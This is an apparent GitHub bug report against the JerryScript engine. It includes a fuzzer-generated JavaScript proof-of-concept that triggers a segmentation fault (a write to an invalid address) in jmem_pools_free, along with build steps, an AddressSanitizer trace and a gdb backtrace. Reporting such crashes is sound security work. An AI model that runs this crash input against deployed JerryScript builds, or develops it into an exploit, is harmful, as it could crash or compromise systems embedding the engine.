SEGV ./jerry-core/jmem/jmem-poolman.c:136:29 in jmem_pools_free #5102

Open
gandalf4a opened this issue Oct 4, 2023 · 0 comments

JerryScript revision
$ git show
commit a588e4966175a190ec6350b2a3689d30ed017ec9 (HEAD -> master, origin/master, origin/HEAD)
Author: Máté Tokodi <[email protected]>
Date:   Wed Sep 20 15:38:30 2023 +0200
Build & Execution platform
$ uname -a
Linux user-AYA-NEO-FOUNDER 5.19.0-43-generic #44~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon May 22 13:39:36 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Build steps
export CC=clang
python tools/build.py --compile-flag=-fsanitize-coverage=trace-pc-guard --compile-flag="-fsanitize=address -g" --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --stack-limit=15 --compile-flag=-Werror --compile-flag=-Wincompatible-pointer-types --compile-flag=-Wno-strict-prototypes
Test case

the pocfile.js

async function f0(a1, a2) {
    function f5(a6, a7, a8, a9) {
        return f5;
    }
    var o10 = {
        "get": Object,
    };
    await 785.2893486668286;
    try {
        f0["F"](h);
    } catch(e16) {
    }
    function f18(a19, a20) {
        return f0;
    }
    var v21 = new Proxy(a1, o10);
    try {
        undefined[Uint8Array](MAX_SAFE_INTEGER);
    } catch(e26) {
        var v27 = 99 | 99;
        for (var v28 = 0; v28 < 100; v28++) {
            try {
                eval(String.fromCodePoint(v27, v28));
                prototype[POSITIVE_INFINITY]();
            } catch(e36) {
            }
        }
    }
    return v21;
}
f0(f0);
// CRASH INFO
// ==========
// TERMSIG: 11
// STDERR:
// 
// STDOUT:
// 
// ARGS: /home/user/jerryscript/build/bin/jerry --reprl-fuzzilli
// EXECUTION TIME: 26ms
Execution steps
./build/bin/jerry pocfile.js
Output

asan report:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==4174418==ERROR: AddressSanitizer: SEGV on unknown address 0x000002032210 (pc 0x00000041ee08 bp 0x000000000008 sp 0x7ffcc387dd60 T0)
==4174418==The signal is caused by a WRITE memory access.
    #0 0x41ee08 in jmem_pools_free /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-poolman.c:136:29
    #1 0x580591 in vm_stack_context_abort_variable_length /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:73:5
    #2 0x580591 in vm_stack_context_abort /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:125:24
    #3 0x580cbc in vm_stack_find_finally /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm-stack.c:420:19
    #4 0x58f8a3 in vm_loop /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:4892:15
    #5 0x582c82 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5211:37
    #6 0x57b6db in opfunc_resume_executable_object /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/opcodes.c:758:25
    #7 0x529e88 in ecma_process_promise_async_reaction_job /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:363:12
    #8 0x529e88 in ecma_process_all_enqueued_jobs /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:567:15
    #9 0x4dbf52 in jerry_run_jobs /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/api/jerryscript.c:1078:24
    #10 0x4d7208 in main /home/user/fuzz/jerryscript_origin/jerryscript/jerry-main/main-desktop.c:229:12
    #11 0x7efc7c629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #12 0x7efc7c629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #13 0x41ee74 in _start (/home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry+0x41ee74)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-poolman.c:136:29 in jmem_pools_free
==4174418==ABORTING
Backtrace
$ gdb -nx -q ./jerry -ex 'r /home/user/vul/crash/Jerryscript/out/crashes/program_20230412010753_28034C1C-6509-445B-8305-557EE504E083_deterministic.js'
Reading symbols from ./jerry...
Starting program: /home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry /home/user/vul/crash/Jerryscript/out/crashes/program_20230412010753_28034C1C-6509-445B-8305-557EE504E083_deterministic.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x000000000041d592 in jmem_heap_find_prev (block_p=<optimized out>) at /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/jmem/jmem-heap.c:379
379	  while (prev_p->next_offset < block_offset)
(gdb) 
Expected behavior

SEGV or crash

Credits:

@gandalf4a
